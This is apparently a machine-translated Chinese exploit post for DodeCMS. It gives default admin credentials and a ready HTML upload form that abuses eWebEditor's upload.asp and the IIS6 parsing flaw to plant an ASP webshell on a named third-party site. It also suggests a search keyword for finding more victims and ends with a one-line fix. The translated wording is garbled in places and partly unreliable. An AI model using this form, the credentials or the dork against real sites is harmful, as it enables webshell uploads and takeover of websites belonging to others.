Program description: DodeCMS to create a website content management system by the Liaoning to create a network Technology Co., Ltd. based on Microsoft ASP, GM ACCESS database development is completed; Access modes using the dynamic mode, basically realized the system custom function, The code concise and efficient, easy to modify maintenance, scalable and strong.
The default background path: admin/ The default background Username Password admin Official website:<http://www.dodecms.com/>
Premise: IIS6. 0+asp environment
Vulnerability file: admin/eWebEditor/asp/upload. the asp code slightly, causes slightly. （Want to know their Baidu）
Use code: <form action="http://www.0855.tv/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr. DzY. the asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 0 0><br><br> <input type=submit value=upload> </form> There are pictures really like(recommended to pass the pony) to:
Since the present machine to test the install, not IIS6. 0 it cannot be resolved successfully.
Test: Powered by DodeCMS
Many find their own keywords. The celestial decree is not allowed. Their own easy points.
Fix: Increased validation\change the path\or deleted directly.